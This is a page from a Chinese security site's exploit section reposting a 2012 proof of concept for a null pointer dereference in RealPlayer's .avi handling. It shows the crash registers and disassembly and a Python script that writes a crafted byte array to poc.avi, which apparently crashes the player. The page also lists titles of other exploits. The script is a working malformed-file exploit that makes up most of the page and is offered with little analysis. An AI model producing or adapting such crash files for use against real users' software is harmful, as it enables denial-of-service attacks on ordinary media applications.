首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 RealPlayer (.avi) Null Pointer Dereference PoC 来源：Senator.of.Pirates.team@gmail.com 作者：Senator 发布时间：2012-04-09   Application :   RealPlayer (.avi) Null Pointer Dereference PoC Versions :   SP 1.1.4 (Build 12.0.0.756) Date :   05/04/2012 Tested :   Windows XP SP3 EN Auther :   Senator of Pirates E-Mail :   Senator.of.Pirates.team@gmail.com FaceBook :   /SenatorofPirates Bug : ----   Register:   EAX 00000000   ECX 00000006   EDX 61B1302C vidplin.61B1302C   EBX 01666548   ESP 0012E328   EBP 0012E340   ESI 00000000   EDI 00000000   EIP 61B00DFF vidplin.61B00DFF   Disassembly:   61b00dfc 8b4510          mov     eax,dword ptr [ebp+10h]   61b00dff 8b10            mov     edx,dword ptr [eax]  ;  access violation when reading 0x00000000 PoC : ------- DATA = ("\x52\x49\x46\x46\x20\x72\x2E\x01\x41\x56\x49\x20\x4C\x49\x53\x54\x48\x01\x00\x00\x68\x64\x72" "\x6C\x61\x76\x69\x68\x38\x00\x00\x00\x6A\x04\x01\x00\x78\x0F\x05\x00\x00\x00\x00\x00\x10\x00" "\x01\x00\xA5\x03\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\xA4\x01\x00\x40\x01\x00\x00\xF0" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54" "\x74\x00\x00\x00\x73\x74\x72\x6C\x73\x74\x72\x68\x38\x00\x00\x00\x76\x69\x64\x73\x6D\x6A\x70" "\x67\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6A\x04\x01\x00\x40\x42\x0F\x00\x00\x00" "\x00\x00\xB1\x03\x00\x00\x00\xA4\x01\x00\x10\x27\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40" "\x01\xF0\x00\x73\x74\x72\x66\x28\x00\x00\x00\x28\x00\x00\x00\x40\x01\x00\x00\xF0\x00\x00\x00" "\x01\x00\x18\x00\x4D\x4A\x50\x47\x00\x84\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x4C\x49\x53\x54\x5E\x00\x00\x00\x73\x74\x72\x6C\x73\x74\x72\x68\x38\x00" "\x00\x00\x61\x75\x64\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01" "\x00\x00\x00\x40\x1F\x00\x00\x00\x00\x00\x00\xC0\xB0\x07\x00\x80\x3E\x00\x00\x10\x27\x00\x00" "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x73\x74\x72\x66\x12\x00\x1E\x00\x01\x00\x01" "\x00\x40\x1F\x00\x00\x40\x1F\x00\x00\x01\x00\x08\x00\x00\x00\x49\x44\x49\x54\x1A\x00\x00\x00" "\x53\x61\x74\x20\x41\x75\x67\x20\x20\x37\x20\x31\x32\x3A\x35\x34\x3A\x30\x32\x20\x32\x30\x31" "\x30\x0A\x00\x4C\x49\x53\x54\x34\x00\x00\x00\x49\x4E\x46\x4F\x49\x53\x46\x54\x28\x00\x00\x00" "\x4F\x4C\x59\x4D\x50\x55\x53\x20\x46\x45\x33\x32\x30\x2C\x58\x38\x33\x35\x2C\x43\x35\x34\x30" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4A\x55\x4E\x4B\x54\x2E" "\x00\x00\x4F\x4C\x59\x4D\x44\x69\x67\x69\x74\x61\x6C\x20\x43\x61\x6D\x65\x72\x61\x4F\x4C\x59" "\x4D\x50\x55\x53\x20\x44\x49\x47\x49\x54\x41\x4C\x20\x43\x41\x4D\x45\x52\x41\x00\x00\x01\x00" "\x44\x34\x33\x36\x33\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x01\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00"); avi = open('poc.avi', 'wb+') avi.write(DATA)     avi.close() print "[-] AVI file generated"   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·CastRipper [.m3u] 2.9.6 stack ·discuz! X1.0 - X1.5 Blind SQL ·Play [EX] 2.1 Playlist File (M ·Hishop 5.4 & 5.4.1 SQL injecti ·Distinct TFTP Server <= 3.01 D ·一次简单的POST注入测试 ·AnvSoft Any Video Converter 4. ·BulletProof FTP Client 2010 - ·Liferay XSL Command Execution ·Snort 2 DCE/RPC preprocessor B ·LANDesk Lenovo ThinkManagement ·Dolibarr ERP & CRM 3 Post-Auth   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved